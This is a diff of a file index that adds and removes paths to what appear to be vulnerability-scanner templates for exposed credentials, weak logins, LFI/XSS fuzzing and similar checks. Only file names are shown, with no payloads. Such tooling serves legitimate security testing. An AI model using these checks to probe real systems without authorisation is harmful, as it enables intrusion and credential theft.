./poc/exposed/exposed-kibana-2.yaml @@ -46063,9 +46039,7 @@ ./poc/exposed/exposed-nomad-7325.yaml ./poc/exposed/exposed-nomad-7326.yaml ./poc/exposed/exposed-nomad-7327.yaml -./poc/exposed/exposed-nomad-7328.yaml ./poc/exposed/exposed-nomad-7329.yaml -./poc/exposed/exposed-nomad-7330.yaml ./poc/exposed/exposed-nomad.yaml ./poc/exposed/exposed-pagespeed-global-admin-7331.yaml ./poc/exposed/exposed-pagespeed-global-admin.yaml @@ -46078,12 +46052,12 @@ ./poc/exposed/exposed-redis-7336.yaml ./poc/exposed/exposed-redis-7337.yaml ./poc/exposed/exposed-redis-7338.yaml +./poc/exposed/exposed-redis-7339.yaml ./poc/exposed/exposed-redis.yaml ./poc/exposed/exposed-service-now-7340.yaml ./poc/exposed/exposed-service-now-7341.yaml ./poc/exposed/exposed-service-now.yaml ./poc/exposed/exposed-sharepoint-list-7344.yaml -./poc/exposed/exposed-sharepoint-list-7345.yaml ./poc/exposed/exposed-sharepoint-list-7346.yaml ./poc/exposed/exposed-sharepoint-list-7347.yaml ./poc/exposed/exposed-sonarqube.yaml @@ -46093,6 +46067,7 @@ ./poc/exposed/exposed-sqlite-manager-7350.yaml ./poc/exposed/exposed-sqlite-manager.yaml ./poc/exposed/exposed-struts.yaml +./poc/exposed/exposed-svn-7351.yaml ./poc/exposed/exposed-svn-7352.yaml ./poc/exposed/exposed-svn-7353.yaml ./poc/exposed/exposed-svn-7354.yaml @@ -46102,20 +46077,19 @@ ./poc/exposed/exposed-symfony-profiler.yaml ./poc/exposed/exposed-user-info-error-messages (2).yaml ./poc/exposed/exposed-vscode-7356.yaml -./poc/exposed/exposed-vscode-7357.yaml +./poc/exposed/exposed-vscode.yaml +./poc/exposed/exposed-webalizer-7358.yaml ./poc/exposed/exposed-webalizer-7359.yaml -./poc/exposed/exposed-webalizer-7360.yaml ./poc/exposed/exposed-webalizer.yaml ./poc/exposed/exposed-zookeeper-7361.yaml ./poc/exposed/exposed-zookeeper-7362.yaml ./poc/exposed/exposed-zookeeper-7363.yaml ./poc/exposed/exposed-zookeeper-7364.yaml -./poc/exposed/exposed-zookeeper-7365.yaml ./poc/exposed/exposed-zookeeper.yaml ./poc/exposed/fanruanoa2012-disclosure-1.yaml ./poc/exposed/fanruanoa2012-disclosure-2.yaml +./poc/exposed/fanruanoa2012-disclosure-7389.yaml ./poc/exposed/fanruanoa2012-disclosure-7390.yaml -./poc/exposed/fanruanoa2012-disclosure.yaml ./poc/exposed/fckeditor-exposed.yaml ./poc/exposed/file-manager-exposed.yaml ./poc/exposed/filezilla-exposed.yaml @@ -46124,18 +46098,18 @@ ./poc/exposed/firebase-config-exposure-7485.yaml ./poc/exposed/firebase-config-exposure-7486.yaml ./poc/exposed/firebase-config-exposure-7488.yaml -./poc/exposed/firebase-config-exposure.yaml ./poc/exposed/firebase-messaging-sw-js-exposure.yaml -./poc/exposed/flink-exposure-7509.yaml ./poc/exposed/flink-exposure-7510.yaml +./poc/exposed/flink-exposure-7511.yaml ./poc/exposed/flink-exposure.yaml ./poc/exposed/ftp-credentials-exposure-7567.yaml -./poc/exposed/ftp-credentials-exposure-7568.yaml +./poc/exposed/ftp-credentials-exposure.yaml ./poc/exposed/get-case-insensitive.yaml ./poc/exposed/git-config-exposure.yaml ./poc/exposed/git-credentials-disclosure-7639.yaml -./poc/exposed/git-credentials-disclosure-7640.yaml +./poc/exposed/git-credentials-disclosure-7641.yaml ./poc/exposed/git-credentials-disclosure-7642.yaml +./poc/exposed/git-credentials-disclosure.yaml ./poc/exposed/git-exposure.yaml ./poc/exposed/git-metadata-exposure.yaml ./poc/exposed/git-repo-disclosure.yaml @@ -46158,8 +46132,8 @@ ./poc/exposed/github-workflows-disclosure-5.yaml ./poc/exposed/github-workflows-disclosure-6.yaml ./poc/exposed/github-workflows-disclosure-7.yaml +./poc/exposed/github-workflows-disclosure-7664.yaml ./poc/exposed/github-workflows-disclosure-7665.yaml -./poc/exposed/github-workflows-disclosure-7666.yaml ./poc/exposed/github-workflows-disclosure-8.yaml ./poc/exposed/github-workflows-disclosure-9.yaml ./poc/exposed/github-workflows-disclosure.yaml @@ -46170,10 +46144,10 @@ ./poc/exposed/glpi-status-ldap-domain-disclosure-3.yaml ./poc/exposed/glpi-telemetry-disclosure-1.yaml ./poc/exposed/glpi-telemetry-disclosure-2.yaml -./poc/exposed/glpi-telemetry-disclosure-7739.yaml ./poc/exposed/glpi-telemetry-disclosure.yaml ./poc/exposed/go-mod-disclosure.yaml ./poc/exposed/go-pprof-exposed.yaml +./poc/exposed/gogs-install-exposure-7755.yaml ./poc/exposed/gogs-install-exposure-7757.yaml ./poc/exposed/gogs-install-exposure-7758.yaml ./poc/exposed/gogs-install-exposure.yaml @@ -46195,8 +46169,8 @@ ./poc/exposed/hidden-api-key-exposure.yaml ./poc/exposed/hikvision-env-disclosure.yaml ./poc/exposed/hp-ilo-serial-key-disclosure-8022.yaml -./poc/exposed/hp-ilo-serial-key-disclosure-8023.yaml ./poc/exposed/hp-ilo-serial-key-disclosure-8024.yaml +./poc/exposed/hp-ilo-serial-key-disclosure-8025.yaml ./poc/exposed/hp-ilo-serial-key-disclosure.yaml ./poc/exposed/ibm-friendly-path-exposure-1.yaml ./poc/exposed/ibm-friendly-path-exposure-2.yaml @@ -46239,13 +46213,14 @@ ./poc/exposed/jenkins-exposed.yaml ./poc/exposed/jenkins-home-dir-exposure.yaml ./poc/exposed/jetty-information-disclosure.yaml +./poc/exposed/jfrog-unauth-build-exposed-8299.yaml ./poc/exposed/jfrog-unauth-build-exposed-8300.yaml ./poc/exposed/jfrog-unauth-build-exposed-8301.yaml ./poc/exposed/jfrog-unauth-build-exposed-8302.yaml ./poc/exposed/jfrog-unauth-build-exposed.yaml ./poc/exposed/jiva-admin-exposure.yaml ./poc/exposed/jolokia-heap-info-disclosure-8357.yaml -./poc/exposed/jolokia-info-disclosure-8358.yaml +./poc/exposed/jolokia-info-disclosure-8359.yaml ./poc/exposed/jolokia-info-disclosure.yaml ./poc/exposed/joomla-sensitive-config.yaml ./poc/exposed/jupyter-notebooks-exposed.yaml @@ -46255,7 +46230,6 @@ ./poc/exposed/kronos-wsld-exposure.yaml ./poc/exposed/kubernetes-kustomization-disclosure-8531.yaml ./poc/exposed/kubernetes-kustomization-disclosure-8532.yaml -./poc/exposed/kubernetes-kustomization-disclosure.yaml ./poc/exposed/kyan-credential-exposure-8554.yaml ./poc/exposed/kyan-credential-exposure.yaml ./poc/exposed/kyan-network-credentials-disclosure.yaml @@ -46268,15 +46242,14 @@ ./poc/exposed/locust-exposure.yaml ./poc/exposed/logstash-config-exposure.yml ./poc/exposed/lvmeng-uts-disclosure-8679.yaml -./poc/exposed/lvmeng-uts-disclosure-8680.yaml ./poc/exposed/lvmeng-uts-disclosure-8681.yaml ./poc/exposed/lvmeng-uts-disclosure.yaml ./poc/exposed/magento-2-exposed-api-1.yaml ./poc/exposed/magento-2-exposed-api-2.yaml ./poc/exposed/magento-2-exposed-api-3.yaml ./poc/exposed/magento-2-exposed-api-8687.yaml +./poc/exposed/magento-2-exposed-api-8688.yaml ./poc/exposed/magento-2-exposed-api-8689.yaml -./poc/exposed/magento-config-disclosure.yaml ./poc/exposed/magento-information-disclosure.yaml ./poc/exposed/mapbox-token-disclosure.yaml ./poc/exposed/mobsf-framework-exposure.yaml @@ -46292,6 +46265,7 @@ ./poc/exposed/netgear-router-exposure-9029.yaml ./poc/exposed/netgear-router-exposure-9030.yaml ./poc/exposed/netgear-router-exposure-9031.yaml +./poc/exposed/netgear-router-exposure.yaml ./poc/exposed/nexus-repo-config-exposure.yml ./poc/exposed/nexus-repository-exposed-configuration.yaml ./poc/exposed/nginx-conf-exposed.yaml @@ -46310,7 +46284,6 @@ ./poc/exposed/oracle-ebs-credentials-disclosure-9363.yaml ./poc/exposed/oracle-ebs-credentials-disclosure.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9367.yaml -./poc/exposed/oracle-ebs-sqllog-disclosure-9369.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9370.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/exposed/oracle-ebs-sqllog-disclosure-9372.yaml @@ -46320,7 +46293,7 @@ ./poc/exposed/path-traversal-exposure.yaml ./poc/exposed/pgadmin-exposure-9488.yaml ./poc/exposed/pgadmin-exposure-9489.yaml -./poc/exposed/pgadmin-exposure-9490.yaml +./poc/exposed/pgadmin-exposure-9491.yaml ./poc/exposed/pgadmin-exposure.yaml ./poc/exposed/php-debugbar-exposure.yaml ./poc/exposed/php-user-ini-disclosure-1.yaml @@ -46336,12 +46309,12 @@ ./poc/exposed/pmb-local-file-disclosure-9616.yaml ./poc/exposed/pmb-local-file-disclosure-9617.yaml ./poc/exposed/pmb-local-file-disclosure-9618.yaml -./poc/exposed/pmb-local-file-disclosure-9620.yaml +./poc/exposed/pmb-local-file-disclosure-9619.yaml +./poc/exposed/pmb-local-file-disclosure.yaml ./poc/exposed/postman-api-key-disclosure.yaml ./poc/exposed/private-key-exposure-9654.yaml ./poc/exposed/prometheus-exposed-panel-9679.yaml ./poc/exposed/prometheus-exposed-panel-9680.yaml -./poc/exposed/prometheus-exposed-panel-9681.yaml ./poc/exposed/prometheus-exposed-panel-9682.yaml ./poc/exposed/prometheus-exposed-panel-9683.yaml ./poc/exposed/prometheus-exposed-panel-9684.yaml @@ -46349,22 +46322,24 @@ ./poc/exposed/prometheus-pushgateway-exposed-panel.yaml ./poc/exposed/proton-recovery-phrase-disclosure.yaml ./poc/exposed/putty-private-key-disclosure-9729.yaml +./poc/exposed/putty-private-key-disclosure-9730.yaml ./poc/exposed/putty-private-key-disclosure-9731.yaml -./poc/exposed/putty-private-key-disclosure-9732.yaml ./poc/exposed/putty-private-key-disclosure.yaml ./poc/exposed/pyproject-disclosure-9735.yaml ./poc/exposed/pyproject-disclosure-9736.yaml -./poc/exposed/pyproject-disclosure-9737.yaml +./poc/exposed/pyproject-disclosure-9738.yaml ./poc/exposed/qianxin-tianqing-info-disclosure.yaml ./poc/exposed/qihang-media-disclosure-9762.yaml ./poc/exposed/qihang-media-disclosure-9763.yaml +./poc/exposed/qihang-media-disclosure-9764.yaml ./poc/exposed/qihang-media-disclosure-9765.yaml +./poc/exposed/qihang-media-disclosure.yaml ./poc/exposed/qvidium-management-system-exposed.yaml ./poc/exposed/qywechat-secret-disclosure.yaml ./poc/exposed/rabbitmq-config-exposure.yml ./poc/exposed/rails-routes-exposed.yaml ./poc/exposed/rails-secret-token-disclosure-9808.yaml -./poc/exposed/rails-secret-token-disclosure-9809.yaml +./poc/exposed/rails-secret-token-disclosure-9810.yaml ./poc/exposed/rails-secret-token-disclosure.yaml ./poc/exposed/razorpay-clientid-disclosure.yaml ./poc/exposed/redis-commander-exposure-9851.yaml @@ -46376,11 +46351,12 @@ ./poc/exposed/rocketmq-console-exposure.yaml ./poc/exposed/roundcube-log-disclosure-1.yaml ./poc/exposed/roundcube-log-disclosure-2.yaml -./poc/exposed/roundcube-log-disclosure-9905.yaml ./poc/exposed/roundcube-log-disclosure-9906.yaml +./poc/exposed/roundcube-log-disclosure-9907.yaml ./poc/exposed/roundcube-log-disclosure.yaml ./poc/exposed/ruby-on-rails-secret-token-disclosure.yaml ./poc/exposed/ruijie-information-disclosure-9930.yaml +./poc/exposed/ruijie-information-disclosure-9931.yaml ./poc/exposed/ruijie-information-disclosure-9932.yaml ./poc/exposed/ruijie-nbr1300g-exposure-9935.yaml ./poc/exposed/ruijie-nbr1300g-exposure-9937.yaml @@ -46394,7 +46370,7 @@ ./poc/exposed/seeyon-a6-createmysql-disclosure.yaml ./poc/exposed/seeyon-a8-info-disclosure.yaml ./poc/exposed/seeyon-oa-session-information-disclosure.yaml -./poc/exposed/selenium-exposure-10138.yaml +./poc/exposed/selenium-exposure-10137.yaml ./poc/exposed/selenium-exposure.yaml ./poc/exposed/selenoid-ui-exposure-10139.yaml ./poc/exposed/selenoid-ui-exposure.yaml @@ -46413,13 +46389,11 @@ ./poc/exposed/sensitive-storage-exposure-4.yaml ./poc/exposed/sensitive-storage-exposure-5.yaml ./poc/exposed/sensitive-storage-exposure-6.yaml -./poc/exposed/sensitive-storage-exposure.yaml ./poc/exposed/sensitives.yaml ./poc/exposed/server-config-exposure.yaml ./poc/exposed/service-now-exposed.yaml ./poc/exposed/setup-page-exposure-1.yaml ./poc/exposed/setup-page-exposure-10180.yaml -./poc/exposed/setup-page-exposure-10181.yaml ./poc/exposed/setup-page-exposure-2.yaml ./poc/exposed/setup-page-exposure-3.yaml ./poc/exposed/setup-page-exposure-4.yaml @@ -46429,12 +46403,12 @@ ./poc/exposed/sftp-credentials-exposure-2.yaml ./poc/exposed/smf-path-disclosure.yaml ./poc/exposed/snyk-ignore-file-disclosure-10346.yaml +./poc/exposed/snyk-ignore-file-disclosure-10347.yaml ./poc/exposed/snyk-ignore-file-disclosure-10348.yaml -./poc/exposed/snyk-ignore-file-disclosure-10349.yaml ./poc/exposed/snyk-ignore-file-disclosure.yaml ./poc/exposed/solr-exposure-10363.yaml +./poc/exposed/solr-exposure-10364.yaml ./poc/exposed/solr-exposure-10365.yaml -./poc/exposed/solr-exposure-10366.yaml ./poc/exposed/solr-exposure.yaml ./poc/exposed/solr-panel-exposure.yaml ./poc/exposed/sonarqube-config-exposure.yml @@ -46452,12 +46426,11 @@ ./poc/exposed/thinkphp-509-information-disclosure-10752.yaml ./poc/exposed/thinkphp-509-information-disclosure-10753.yaml ./poc/exposed/thinkphp-509-information-disclosure-10754.yaml -./poc/exposed/thinkphp-509-information-disclosure-10755.yaml ./poc/exposed/thinkphp-509-information-disclosure.yaml ./poc/exposed/thumbs-db-disclosure-10760.yaml ./poc/exposed/thumbs-db-disclosure-10761.yaml ./poc/exposed/thumbs-db-disclosure-10762.yaml -./poc/exposed/thumbs-db-disclosure.yaml +./poc/exposed/thumbs-db-disclosure-10763.yaml ./poc/exposed/titannit-web-exposure.yaml ./poc/exposed/tomcat-cookie-exposed.yaml ./poc/exposed/tomcat-exposed-docs.yaml @@ -46471,9 +46444,8 @@ ./poc/exposed/travis-ci-disclosure.yaml ./poc/exposed/truffle-config-exposure.yaml ./poc/exposed/tugboat-config-exposure-10841.yaml -./poc/exposed/tugboat-config-exposure-10842.yaml +./poc/exposed/tugboat-config-exposure-10843.yaml ./poc/exposed/tugboat-config-exposure-10844.yaml -./poc/exposed/tugboat-config-exposure.yaml ./poc/exposed/typea-ftc-disclosure-76c6b84ccd9f6bd60eada03675ff7bce.yaml ./poc/exposed/typea-ftc-disclosure-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/exposed/typea-ftc-disclosure.yaml @@ -46485,8 +46457,8 @@ ./poc/exposed/vpc-endpoint-exposed.yaml ./poc/exposed/wallet-recovery-phrase-disclosure.yml ./poc/exposed/watchguard-credentials-disclosure-11105.yaml -./poc/exposed/watchguard-credentials-disclosure-11106.yaml ./poc/exposed/watchguard-credentials-disclosure-11107.yaml +./poc/exposed/watchguard-credentials-disclosure.yaml ./poc/exposed/weaver_e_cology9_Information_disclosure.yaml ./poc/exposed/webmin-config-exposure.yml ./poc/exposed/wordpress-config-disclosure.yaml @@ -46495,8 +46467,8 @@ ./poc/exposed/wordpress-wp-config-exposure.yml ./poc/exposed/wordpress-wpcourses-info-disclosure-11367.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure-11368.yaml +./poc/exposed/wordpress-wpcourses-info-disclosure-11369.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure-11370.yaml -./poc/exposed/wordpress-wpcourses-info-disclosure-11371.yaml ./poc/exposed/wordpress-wpcourses-info-disclosure.yaml ./poc/exposed/wp-affiliate-disclosure-047309c077ef8436ac32af01d6e52b55.yaml ./poc/exposed/wp-affiliate-disclosure-10a22924ce2a012a99f4110178fc4e04.yaml @@ -46506,16 +46478,16 @@ ./poc/exposed/wp-affiliate-disclosure-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/exposed/wp-affiliate-disclosure.yaml ./poc/exposed/wp-config.php-disclosure.yaml +./poc/exposed/wp-full-path-disclosure-11455.yaml ./poc/exposed/wp-full-path-disclosure-11456.yaml -./poc/exposed/wp-full-path-disclosure-11457.yaml ./poc/exposed/wp-full-path-disclosure.yaml ./poc/exposed/wp-mailchimp-log-exposure-11493.yaml ./poc/exposed/wp-mailchimp-log-exposure-11494.yaml ./poc/exposed/wpeprivate-config-disclosure.yaml ./poc/exposed/wpsensitiveinfo.yaml ./poc/exposed/x5engine-full-path-disclosure.yaml +./poc/exposed/yarn-manager-exposure-11731.yaml ./poc/exposed/yarn-manager-exposure-11732.yaml -./poc/exposed/yarn-manager-exposure-11733.yaml ./poc/exposed/yarn-manager-exposure.yaml ./poc/exposed/yonyou-nc-wsncapplet-disclosure.yaml ./poc/exposed/yyoa-a6-userinfo-disclosure.yaml @@ -46524,8 +46496,8 @@ ./poc/exposed/zenphoto-installation-sensitive-info-2.yaml ./poc/exposed/zenphoto-installation-sensitive-info-3.yaml ./poc/exposed/zenphoto-installation-sensitive-info-4.yaml -./poc/exposed/zenphoto-installation-sensitive-info.yaml ./poc/exposed/zenphoto-sensitive-info-1.yaml +./poc/exposed/zenphoto-sensitive-info-11784.yaml ./poc/exposed/zenphoto-sensitive-info-2.yaml ./poc/exposed/zenphoto-sensitive-info-3.yaml ./poc/exposed/zenphoto-sensitive-info-4.yaml @@ -46543,6 +46515,7 @@ ./poc/extract/extract-firebase-database.yaml ./poc/extract/extract-urls-7368.yaml ./poc/extract/extract-urls-7369.yaml +./poc/extract/extract-urls-7370.yaml ./poc/extract/extract-urls.yaml ./poc/extract/extract.yaml ./poc/extract/extractor-bitcoin.yaml @@ -46578,7 +46551,6 @@ ./poc/favicon/favicon-by-realfavicongenerator-e94e235c33e1a3c3c8b84ec6688a2709.yaml ./poc/favicon/favicon-by-realfavicongenerator.yaml ./poc/favicon/favicon-detect.yaml -./poc/favicon/favicon-detection-7441.yaml ./poc/favicon/favicon-detection-7442.yaml ./poc/favicon/favicon-detection-7443.yaml ./poc/favicon/favicon-detection-7445.yaml @@ -46602,11 +46574,14 @@ ./poc/ftp/aws-sftp-detect.yaml ./poc/ftp/crush-ftp-detect-1270.yaml ./poc/ftp/crush-ftp-detect-1271.yaml +./poc/ftp/crush-ftp-detect-1272.yaml ./poc/ftp/crush-ftp-detect.yaml ./poc/ftp/crush-ftp-login-1273.yaml ./poc/ftp/crush-ftp-login-1274.yaml +./poc/ftp/crush-ftp-login-1275.yaml ./poc/ftp/crush-ftp-login.yaml ./poc/ftp/crushftp-anonymous-login.yaml +./poc/ftp/crushftp-default-login.yaml ./poc/ftp/dahua-smart-park-deleteftp-rce.yaml ./poc/ftp/dionaea-ftp-honeypot-detect.yaml ./poc/ftp/dionaea-ftp-honeypot-detection.yaml @@ -46614,14 +46589,13 @@ ./poc/ftp/ftp-access.yaml ./poc/ftp/ftp-anonymous-login.yaml ./poc/ftp/ftp-credentials-exposure-7567.yaml -./poc/ftp/ftp-credentials-exposure-7568.yaml +./poc/ftp/ftp-credentials-exposure.yaml ./poc/ftp/ftp-default-credentials.yaml ./poc/ftp/ftp-default-creds.yaml ./poc/ftp/ftp-weak-credentials-7569.yaml -./poc/ftp/ftp-weak-credentials-7570.yaml ./poc/ftp/ftp-weak-credentials.yaml +./poc/ftp/ftpconfig-7565.yaml ./poc/ftp/ftpconfig-7566.yaml -./poc/ftp/ftpconfig.yaml ./poc/ftp/gnu-inetutils-ftpd-detect.yaml ./poc/ftp/mainwp-updraftplus-extension-32da2ccdaaac8b19165da0cc67dc1c8d.yaml ./poc/ftp/mainwp-updraftplus-extension-3642dbf393631c48d93989f2e01cf01e.yaml @@ -46684,7 +46658,6 @@ ./poc/ftp/unauth-ftp-10939.yaml ./poc/ftp/unauth-ftp-10940.yaml ./poc/ftp/unauth-ftp-10941.yaml -./poc/ftp/unauth-ftp-10942.yaml ./poc/ftp/unauth-ftp.yaml ./poc/ftp/unrestricted-sg-ingress-ftp-port.yaml ./poc/ftp/updraftplus-132b1db14c9aafb4ccfc0ec8e04b9e98.yaml @@ -46720,15 +46693,14 @@ ./poc/ftp/updraftplus.yaml ./poc/ftp/vmware-ftp-server.yaml ./poc/ftp/vsftpd-backdoor.yaml -./poc/ftp/vsftpd-detection-11073.yaml ./poc/ftp/vsftpd-detection-11074.yaml +./poc/ftp/vsftpd-detection-11075.yaml ./poc/ftp/vsftpd-detection-11076.yaml ./poc/ftp/vsftpd-detection.yaml ./poc/ftp/wanhu-ezoffice-download-ftp-jsp-filedownload.yaml ./poc/ftp/wanhu-oa-download-ftp-file-read.yaml ./poc/ftp/wanhuOA-download-ftp.yaml ./poc/ftp/web-ftp-detect-11135.yaml -./poc/ftp/web-ftp-detect-11136.yaml ./poc/ftp/web-ftp-detect-11137.yaml ./poc/ftp/web-ftp-detect-11138.yaml ./poc/ftp/wing-ftp-detect.yaml @@ -46764,6 +46736,7 @@ ./poc/fuzz/generic-lfi-fuzzing.yaml ./poc/fuzz/get_fuzzing.yaml ./poc/fuzz/lfi-fuzz.yaml +./poc/fuzz/lfi-linux-fuzz.yaml ./poc/fuzz/linux-lfi-fuzz.yaml ./poc/fuzz/linux-lfi-fuzzing.yaml ./poc/fuzz/log4j-fuzz-head-poc-v1.yaml @@ -46785,7 +46758,7 @@ ./poc/fuzz/xss-fuzz.yaml ./poc/fuzz/xss-fuzz.yml ./poc/fuzz/xss_fuzzer.yaml -./poc/gcloud/GCP-service-account.yaml +./poc/gcloud/GCP-service-account (copy 1).yaml ./poc/gcloud/cloud-enum-gcp-app-engine.yaml ./poc/gcloud/cloud-enum-gcp-bucket.yaml ./poc/gcloud/cloud-enum-gcp-firebase-app.yaml @@ -46796,6 +46769,7 @@ ./poc/gcloud/gcp-bucket-enum.yaml ./poc/gcloud/gcp-firebase-app-enum.yaml ./poc/gcloud/gcp-firebase-rtdb-enum.yaml +./poc/gcloud/gcp-service-account-11851.yaml ./poc/gcloud/gcp-service-account-7575.yaml ./poc/gcloud/gcp-service-account.yaml ./poc/gcloud/nktagcloud-a8e6501893b16cbc2185c791f71d5631.yaml @@ -46823,8 +46797,8 @@ ./poc/git/api-gitlab.yml ./poc/git/axiom-digitalocean-key-exposure-665.yaml ./poc/git/axiom-digitalocean-key-exposure-666.yaml -./poc/git/axiom-digitalocean-key-exposure-667.yaml ./poc/git/axiom-digitalocean-key-exposure-668.yaml +./poc/git/axiom-digitalocean-key-exposure.yaml ./poc/git/cgit.yaml ./poc/git/custom-dot-git-detect.yaml ./poc/git/digital-agency-lite-1d0d069f8e40de9d56d2bab8f8887bf2.yaml @@ -46923,7 +46897,6 @@ ./poc/git/exposed-gitignore-2.yaml ./poc/git/exposed-gitignore-3.yaml ./poc/git/exposed-gitignore-7302.yaml -./poc/git/exposed-gitignore-7303.yaml ./poc/git/exposed-gitignore-7304.yaml ./poc/git/exposed-gitignore-7306.yaml ./poc/git/exposed-gitlab-ci-config.yaml @@ -46931,6 +46904,7 @@ ./poc/git/exposed-gitworkflows.yaml ./poc/git/git-config-7633.yaml ./poc/git/git-config-7634.yaml +./poc/git/git-config-7635.yaml ./poc/git/git-config-7636.yaml ./poc/git/git-config-7637.yaml ./poc/git/git-config-7638.yaml @@ -46943,9 +46917,10 @@ ./poc/git/git-config-nginxoffbyslash-5.yaml ./poc/git/git-config-nginxoffbyslash-6.yaml ./poc/git/git-config-nginxoffbyslash-7.yaml +./poc/git/git-config-nginxoffbyslash-7628.yaml ./poc/git/git-config-nginxoffbyslash-7629.yaml +./poc/git/git-config-nginxoffbyslash-7630.yaml ./poc/git/git-config-nginxoffbyslash-7631.yaml -./poc/git/git-config-nginxoffbyslash-7632.yaml ./poc/git/git-config-nginxoffbyslash-8.yaml ./poc/git/git-config-nginxoffbyslash-9.yaml ./poc/git/git-config-nginxoffbyslash.yaml @@ -46953,8 +46928,9 @@ ./poc/git/git-credentials-7643.yaml ./poc/git/git-credentials-7644.yaml ./poc/git/git-credentials-disclosure-7639.yaml -./poc/git/git-credentials-disclosure-7640.yaml +./poc/git/git-credentials-disclosure-7641.yaml ./poc/git/git-credentials-disclosure-7642.yaml +./poc/git/git-credentials-disclosure.yaml ./poc/git/git-credentials.yaml ./poc/git/git-exposure.yaml ./poc/git/git-folder.yaml @@ -46975,6 +46951,7 @@ ./poc/git/gitbook-detect-7624.yaml ./poc/git/gitbook-detect-7625.yaml ./poc/git/gitbook-takeover-7626.yaml +./poc/git/gitbook-takeover-7627.yaml ./poc/git/gitbook-takeover.yaml ./poc/git/gitbook.yaml ./poc/git/gitbucket.yaml @@ -46990,15 +46967,18 @@ ./poc/git/github-app-token.yaml ./poc/git/github-enterprise-detect-7647.yaml ./poc/git/github-enterprise-detect-7648.yaml +./poc/git/github-enterprise-detect-7649.yaml ./poc/git/github-enterprise-detect-7650.yaml ./poc/git/github-enterprise-detect-7651.yaml ./poc/git/github-enterprise-detect.yaml ./poc/git/github-gemfile-files-1.yaml ./poc/git/github-gemfile-files-2.yaml ./poc/git/github-gemfile-files-7652.yaml +./poc/git/github-gemfile-files-7653.yaml ./poc/git/github-login-check.yaml ./poc/git/github-oauth-token.yaml ./poc/git/github-outdated-key.yaml +./poc/git/github-page-config-7654.yaml ./poc/git/github-page-config-7655.yaml ./poc/git/github-page-config-7656.yaml ./poc/git/github-personal-token.yaml @@ -47031,8 +47011,8 @@ ./poc/git/github-workflows-disclosure-5.yaml ./poc/git/github-workflows-disclosure-6.yaml ./poc/git/github-workflows-disclosure-7.yaml +./poc/git/github-workflows-disclosure-7664.yaml ./poc/git/github-workflows-disclosure-7665.yaml -./poc/git/github-workflows-disclosure-7666.yaml ./poc/git/github-workflows-disclosure-8.yaml ./poc/git/github-workflows-disclosure-9.yaml ./poc/git/github-workflows-disclosure.yaml @@ -47061,10 +47041,8 @@ ./poc/git/gitlab-public-repos-7678.yaml ./poc/git/gitlab-public-repos-7679.yaml ./poc/git/gitlab-public-repos-7680.yaml -./poc/git/gitlab-public-repos.yaml ./poc/git/gitlab-public-signup-7681.yaml ./poc/git/gitlab-public-signup-7682.yaml -./poc/git/gitlab-public-signup-7683.yaml ./poc/git/gitlab-public-signup-7684.yaml ./poc/git/gitlab-public-signup.yaml ./poc/git/gitlab-public-snippets-1.yaml @@ -47102,7 +47080,6 @@ ./poc/git/gitlab-weak-login-7705.yaml ./poc/git/gitlab-weak-login-7706.yaml ./poc/git/gitlab-weak-login-7707.yaml -./poc/git/gitlab-weak-login.yaml ./poc/git/gitlab-workflow-7708.yaml ./poc/git/gitleak.yaml ./poc/git/gitlist-disclosure.yaml @@ -47129,7 +47106,6 @@ ./poc/git/woo-checkout-for-digital-goods-c4950da5cbd10141c56c420499671594.yaml ./poc/git/woo-checkout-for-digital-goods.yaml ./poc/git/wordpress-git-config-1.yaml -./poc/git/wordpress-git-config-11278.yaml ./poc/git/wordpress-git-config-11279.yaml ./poc/git/wordpress-git-config-2.yaml ./poc/git/wp-githuber-md-3d4ca604f74dfc99007278807d75f075.yaml @@ -47154,7 +47130,7 @@ ./poc/google/address-autocomplete-using-google-place-api-plugin.yaml ./poc/google/address-autocomplete-using-google-place-api.yaml ./poc/google/ads-malware-google.yaml -./poc/google/api-google-drive.yaml +./poc/google/api-google-drive-432.yaml ./poc/google/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml ./poc/google/api-key-for-google-maps.yaml ./poc/google/bwp-google-xml-sitemaps-b789bd36fd13df2696b89e73e738641b.yaml @@ -47330,6 +47306,7 @@ ./poc/google/google-earth-dlogin-7778.yaml ./poc/google/google-earth-dlogin-7779.yaml ./poc/google/google-earth-dlogin-7780.yaml +./poc/google/google-earth-dlogin-7781.yaml ./poc/google/google-earth-dlogin-7782.yaml ./poc/google/google-earth-dlogin.yaml ./poc/google/google-earthenterprise-weak-password.yaml @@ -47438,6 +47415,7 @@ ./poc/google/google-places-reviews-a9b6955a2812b2fe0a13ae0f0752d58f.yaml ./poc/google/google-places-reviews.yaml ./poc/google/google-safebrowsing.yaml +./poc/google/google-secrets.yaml ./poc/google/google-seo-author-snippets-c7ef7a54325272053bde6fd4c9883ada.yaml ./poc/google/google-seo-author-snippets-ce873f3e8d7877eb7cdc80ae1da6d769.yaml ./poc/google/google-seo-author-snippets-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -47469,6 +47447,7 @@ ./poc/google/google-sitemap-plugin-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/google/google-sitemap-plugin-plugin.yaml ./poc/google/google-sitemap-plugin.yaml +./poc/google/google-storage-7788.yaml ./poc/google/google-storage-7789.yaml ./poc/google/google-storage-7790.yaml ./poc/google/google-storage-7791.yaml @@ -47828,15 +47807,15 @@ ./poc/graphql/graphql-8.yaml ./poc/graphql/graphql-9.yaml ./poc/graphql/graphql-alias-batching-7826.yaml -./poc/graphql/graphql-alias-batching.yaml ./poc/graphql/graphql-apiforwp-detect.yaml ./poc/graphql/graphql-apollo-detect.yaml ./poc/graphql/graphql-ariadne-detect.yaml ./poc/graphql/graphql-array-batching-7827.yaml ./poc/graphql/graphql-array-batching-7828.yaml +./poc/graphql/graphql-array-batching.yaml ./poc/graphql/graphql-depth-limit.yaml ./poc/graphql/graphql-detect-7829.yaml -./poc/graphql/graphql-detect-7831.yaml +./poc/graphql/graphql-detect-7830.yaml ./poc/graphql/graphql-detect-7832.yaml ./poc/graphql/graphql-detect.yaml ./poc/graphql/graphql-dianajl-detect.yaml @@ -47845,7 +47824,6 @@ ./poc/graphql/graphql-flutter-detect.yaml ./poc/graphql/graphql-get-method-7835.yaml 